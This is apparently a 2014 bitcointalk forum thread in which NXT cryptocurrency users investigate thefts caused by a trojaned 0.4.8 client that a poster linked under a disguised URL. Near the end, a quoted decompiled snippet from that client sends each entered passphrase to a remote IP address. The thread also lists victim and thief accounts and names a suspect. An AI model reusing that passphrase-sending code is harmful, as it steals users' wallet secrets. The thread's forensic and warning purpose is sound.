NXT :: descendant of Bitcoin - Updated Information

[plasticAiredale]

Let's keep the historical record straight here.  sparta_cuss reported this before PaulyC, and sparta_cuss was immediately blown off by CfB:

Quote from: sparta_cuss on January 01, 2014, 04:05:58 PM

Hey, looks like I just got robbed, too.
Someone please check this account: 12152013998194592943
They now have 147k+ from me.
Had a 40 char random password, capital, lower, numbers, symbols.
WTF?

Quote from CfB:

Can u prove that ur coins were stolen?
My account passphrase < 40 chars and contains 2M, why did the thief choose ur account instead of mine? Sorry, but ur case looks more like black PR attempt.

There's a clear pattern if you look at all the data:

Time   Victim   Vic Account   Thief Account   NXT
            
01.01.2014 12:56:54   plasticAiredale    8439060069775407509   15182566201738727933   18665
01.01.2014 12:58:03   PaulyC   16821029889165561706   16204974692852323982   7808
01.01.2014 13:01:45   newcn   16886318053889080545   9793828175536096502   18197
01.01.2014 13:05:06   sparta_cuss   11794318797680953099   12152013998194592943   147690

Somebody is manually stealing data at 3-4 minute intervals and Sparta_cuss was by far the most wronged.  We should check the blocks / transactions/ accounts before and after this time period.

Don't forget Framewood, too.  Please notice the date and how little the community paid attention.

https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532

This bears repeating:

Please notice the date and how little the community paid attention. 

Yeah unfortunately at the time it was a one time thing, made by a Jr. Member so everybody probably just figured it was user error, plus he didn't raise much of a stink after. Doesn't justify it, but probably explains it.

Currently it looks like EpicThomas only was able to get a few accounts. Hopefully now people will be more vigilante with downloading new clients. But if there is no official client, or at least one endorsed by CFB how do we even know if the posted hash is the one for the client that isn't hacked. Who else can we trust?

[1714957296]

1714957296

[1714957296]

1714957296

[1714957296]

1714957296

[1714957296]

1714957296

[1714957296]

1714957296

[1714957296]

1714957296

[Buratino]

Is it possible to provide self test (like ECC) mechanism for safety code in Nxt client to prevent thefts in future?

[salsacz]

...

please add big warning not to use downloading link from the cache. And congrats - now we have all clues.

[LiQio]

...

please add big warning not to use downloading link from the cache. And congrats - now we have all clues.

Done

[plasticAiredale]

...

please add big warning not to use downloading link from the cache. And congrats - now we have all clues.

Done

I modified my posts as well. Good thinking.

[utopianfuture]

Let's keep the historical record straight here.  sparta_cuss reported this before PaulyC, and sparta_cuss was immediately blown off by CfB:

Quote from: sparta_cuss on January 01, 2014, 04:05:58 PM

Hey, looks like I just got robbed, too.
Someone please check this account: 12152013998194592943
They now have 147k+ from me.
Had a 40 char random password, capital, lower, numbers, symbols.
WTF?

Don't forget Framewood, too.  Please notice the date and how little the community paid attention.

https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532

This bears repeating:

Please notice the date and how little the community paid attention. 

Yeah unfortunately at the time it was a one time thing, made by a Jr. Member so everybody probably just figured it was user error, plus he didn't raise much of a stink after. Doesn't justify it, but probably explains it.

Currently it looks like EpicThomas only was able to get a few accounts. Hopefully now people will be more vigilante with downloading new clients. But if there is no official client, or at least one endorsed by CFB how do we even know if the posted hash is the one for the client that isn't hacked. Who else can we trust?

We have three groups of core developers: BCNext, CfB and Luc. Luc will release new clients from now on. He just posted the 0.4.9 client and I am running it right now.

[landomata]

Ben just posted this in Forum....should this be regulated.

*LINK TO THE NEW CLIENT!

https://nextcoin.org/index.php/topic,2038.0/topicseen.html

WHO IS PUNKROCK?


This kind of link matches EPICTHOMAS Pattern!


We need multiple checks on this.

[Damelon]

I just checked the nxt$Crypto.class that I downloaded yesterday via the instructions for linux, and I get this.
It doesn't match at all with what is reported should be in there, but is also different from the "modified" file posted yesterday.
Can someone explain if I need to freak out or not?

Code:

import java.security.MessageDigest;
import java.util.Arrays;

class Nxt$Crypto
{
  static byte[] getPublicKey(String paramString)
  {
    try
    {
      byte[] arrayOfByte = new byte[32];
      Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8")));
      return arrayOfByte;
    }
    catch (Exception localException) {}
    return null;
  }
  
  static byte[] sign(byte[] paramArrayOfByte, String paramString)
  {
    try
    {
      byte[] arrayOfByte1 = new byte[32];
      byte[] arrayOfByte2 = new byte[32];
      MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
      Nxt.Curve25519.keygen(arrayOfByte1, arrayOfByte2, localMessageDigest.digest(paramString.getBytes("UTF-8")));
      byte[] arrayOfByte3 = localMessageDigest.digest(paramArrayOfByte);
      localMessageDigest.update(arrayOfByte3);
      byte[] arrayOfByte4 = localMessageDigest.digest(arrayOfByte2);
      byte[] arrayOfByte5 = new byte[32];
      Nxt.Curve25519.keygen(arrayOfByte5, null, arrayOfByte4);
      localMessageDigest.update(arrayOfByte3);
      byte[] arrayOfByte6 = localMessageDigest.digest(arrayOfByte5);
      byte[] arrayOfByte7 = new byte[32];
      Nxt.Curve25519.sign(arrayOfByte7, arrayOfByte6, arrayOfByte4, arrayOfByte2);
      byte[] arrayOfByte8 = new byte[64];
      System.arraycopy(arrayOfByte7, 0, arrayOfByte8, 0, 32);
      System.arraycopy(arrayOfByte6, 0, arrayOfByte8, 32, 32);
      return arrayOfByte8;
    }
    catch (Exception localException) {}
    return null;
  }
  
  static boolean verify(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte[] paramArrayOfByte3)
  {
    try
    {
      byte[] arrayOfByte1 = new byte[32];
      byte[] arrayOfByte2 = new byte[32];
      System.arraycopy(paramArrayOfByte1, 0, arrayOfByte2, 0, 32);
      byte[] arrayOfByte3 = new byte[32];
      System.arraycopy(paramArrayOfByte1, 32, arrayOfByte3, 0, 32);
      Nxt.Curve25519.verify(arrayOfByte1, arrayOfByte2, arrayOfByte3, paramArrayOfByte3);
      MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
      byte[] arrayOfByte4 = localMessageDigest.digest(paramArrayOfByte2);
      localMessageDigest.update(arrayOfByte4);
      byte[] arrayOfByte5 = localMessageDigest.digest(arrayOfByte1);
      return Arrays.equals(arrayOfByte3, arrayOfByte5);
    }
    catch (Exception localException) {}
    return false;
  }
}

[rlh]

Sorry if I'm the 1 millionth person to ask but... source?

[bidji29]

Sorry if I'm the 1 millionth person to ask but... source?

Tommorow

[rlh]

Sorry if I'm the 1 millionth person to ask but... source?

Tommorow

Ah, I see now.  I didn't realize it was pushed back a day.  Thank you.

[salsacz]

Punkrock is a german mod who was releasing posts about new versions of the clients. He also changed the downloading link from the Drexme's post. But all punkrock's links were OK, they lead to the right MEGA links.

[landomata]

Sorry if I'm the 1 millionth person to ask but... source?

Tommorow

Ah, I see now.  I didn't realize it was pushed back a day.  Thank you.

It was always set for the 3rd of Jan

[utopianfuture]

Sorry if I'm the 1 millionth person to ask but... source?

Tommorow

Ah, I see now.  I didn't realize it was pushed back a day.  Thank you.

Nah it was not pushed back. Always intend to be released on 5th Bitcoin birthday January, 3.

[rickyjames]

OK, a summary of that we know so far:

The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun.  

Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from: http://info.nxtcrypto.org/nxt-client-0.4.8.zip".  The mouseover link that appears goes to http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says http://info,nxtcrypto.org/nxt-client-0.4.8.zip.

http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=de

EpicThomas made is original post which contained the bad link at 31.12.2013 13:23:22 and then later edited his post and CHANGED IT BACK to the correct client.

The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K) , then newcn (18K), then plasticAiredale (19K).  The 0.4.8 losses we do know of came in a 8 minute window:

Time   Victim   Vic Account   Thief Account   NXT
            
01.01.2014 12:56:54   plasticAiredale    8439060069775407509   15182566201738727933   18665
01.01.2014 12:58:03   PaulyC   16821029889165561706   16204974692852323982   7808
01.01.2014 13:01:45   newcn   16886318053889080545   9793828175536096502   18197
01.01.2014 13:05:06   sparta_cuss   11794318797680953099   12152013998194592943   147690

There may well be more 0.4.8 losses that haven't been discovered or reported yet.  

There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on  December 27, 2013, 06:26:16 PM See:  https://bitcointalk.org/index.php?topic=345619.msg4172532#msg4172532 . If so, here is the first reported loss:

Time   Victim   Vic Account   Thief Account   NXT
            
26.12.2013 17:09:30   Framewood   697109629372813510   13643712185318669838  100088

Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000.

There's got to be more.  Keep digging.

[pinarello]

Is 17480583094667840121 your new account?

That is not my account.

Sorry that was directed to PaulyC.

Hey sorry just saw this.
That's very generous! thanks Gbeirn.
I don't even know when I'll check if it's in there, I'm freaked until the *confirmed client.. hah

Yes this account hasn't been compromised and has a strong 40+ random PW, I haven't used it since 4.7e!

Edit** Decided as everyone should to start fresh new Acct#
with the windows installer from Pg. 1. Check sum'd and Hash good. thanks to anyone who can contribute.

NXT
14008664550450326382

I did get a pm from another poster who mentioned setting up a bounty for me, so I don't know what the protocol is here, sorry. thanks!

So you confirm that windows installer from page 1 is ok?


Pin

[Damelon]

No problem

I would also be interested if with the advent of the asset exchange it would be possible to move all my 1350+ aliases to a new account.
Took me quite a while to get them and I would HATE to lose them!

[utopianfuture]

OK, a summary of that we know so far:

The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun.  

Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from: http://info.nxtcrypto.org/nxt-client-0.4.8.zip".  The mouseover link that appears goes to http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says http://info,nxtcrypto.org/nxt-client-0.4.8.zip.

http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=de

EpicThomas then later edited his post and CHANGED IT BACK to the correct client.

The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K) , then newcn (18K), then plasticAiredale (19K).  The 0.4.8 losses we do know of came in a 8 minute window:

Time   Victim   Vic Account   Thief Account   NXT
            
01.01.2014 12:56:54   plasticAiredale    8439060069775407509   15182566201738727933   18665
01.01.2014 12:58:03   PaulyC   16821029889165561706   16204974692852323982   7808
01.01.2014 13:01:45   newcn   16886318053889080545   9793828175536096502   18197
01.01.2014 13:05:06   sparta_cuss   11794318797680953099   12152013998194592943   147690

There may well be more 0.4.8 losses that haven't been discovered or reported yet.  

There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on  December 27, 2013, 06:26:16 PM.  If so, here is the first reported loss:

Time   Victim   Vic Account   Thief Account   NXT
            
26.12.2013 17:09:30   Framewood   697109629372813510   13643712185318669838  100088

Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000.

There's got to be more.  Keep digging.

More evidence. The ip address where the bogus client was stored  belongs to EpicThomas, the same as epicdices.com

Quote from: notsoshifty on Today at 01:46:08 AM
Quote from: notsoshifty on Today at 01:38:41 AM
Interesting...:

Code:
     if (!paramString.equals(""))
      {
        if (!myKeys.contains(paramString))
        {
          URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
          URLConnection connection = url.openConnection();
          connection.setConnectTimeout(10000);
          connection.getInputStream();
          myKeys.add(paramString);
        }
      }


epicdices.com is also hosted on 162.243.246.223 - coincidence?

no, as I wrote here, we know identity of the hacker:

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts

[bahamapascal]

C-f-B, or any other dev here, could you review this Idea? And let us know your opinion, I am not a coder so maybe my Idea is not possible from a technical point of view.

It's multisig feature that is scheduled on later date.

LOL, so I just reinvented the wheel
Never knew multisig was meant to be used for 2fa, cool

[mnightwaffle]

So you confirm that windows installer from page 1 is ok?


Pin

Nxt 0.4.8 - https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI
SHA256 hash - ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2

yes, the above checks out
Not 100% sure about the self-installing client